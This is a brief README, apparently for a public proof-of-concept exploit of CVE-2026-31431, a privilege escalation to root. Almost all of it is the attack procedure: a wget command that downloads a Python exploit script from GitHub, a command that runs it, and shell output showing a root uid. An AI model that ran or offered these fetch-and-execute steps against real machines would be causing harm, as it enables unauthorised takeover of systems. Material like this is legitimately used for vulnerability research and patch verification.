
Proof-of-concept exploit for CVE-2026-31431, demonstrating privilege escalation to root. Includes a Python script for reproduction.
PoC of CVE-2026-31431
wget https://raw.githubusercontent.com/pedromizz/copy-fail/main/poc.py python3 poc.py
$ id uid=0(root)
~ pedromizz :]